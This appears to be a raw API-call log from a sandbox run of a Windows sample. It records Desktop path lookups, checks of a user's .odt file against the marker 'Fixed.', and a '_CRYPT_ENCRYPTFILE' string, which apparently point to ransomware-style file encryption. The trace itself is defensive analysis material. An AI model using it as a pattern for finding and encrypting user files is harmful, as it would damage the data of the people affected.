[0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xTq6MCScdpqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tq6MCScdpqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q6MCScdpqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6MCScdpqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MCScdpqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CScdpqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ScdpqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cdpqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dpqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pqJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qJ.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0211.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0211.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0211.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0211.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0211.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0211.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0211.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0211.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0211.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0211.907] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0211.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0211.907] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0211.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0211.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0211.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0211.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0211.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0211.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0211.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0211.916] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0211.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0211.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0211.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0211.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0211.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0211.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0211.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0211.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0211.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0211.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0211.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0211.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0211.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0211.917] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0211.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0211.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0211.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0211.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0211.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0211.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0211.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0211.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0211.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0211.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0211.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0211.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0211.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0211.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0211.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0211.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0211.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0211.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0211.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0211.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0211.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0211.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0211.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0211.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0211.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0211.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0211.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0211.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0211.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0211.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0211.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0211.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0211.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0211.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0211.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0211.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0211.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0211.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0211.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0211.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0211.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0211.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0211.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.926] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/xTq6MCScdpqJ.odt", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef945870, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0xecd00810, ftLastAccessTime.dwHighDateTime=0x1d5e518, ftLastWriteTime.dwLowDateTime=0xecd00810, ftLastWriteTime.dwHighDateTime=0x1d5e518, nFileSizeHigh=0x0, nFileSizeLow=0x9c99, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="xTq6MCScdpqJ.odt", cAlternateFileName="XTQ6MC~1.ODT")) returned 0xa86f90 [0211.926] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0211.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0211.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0211.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0211.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 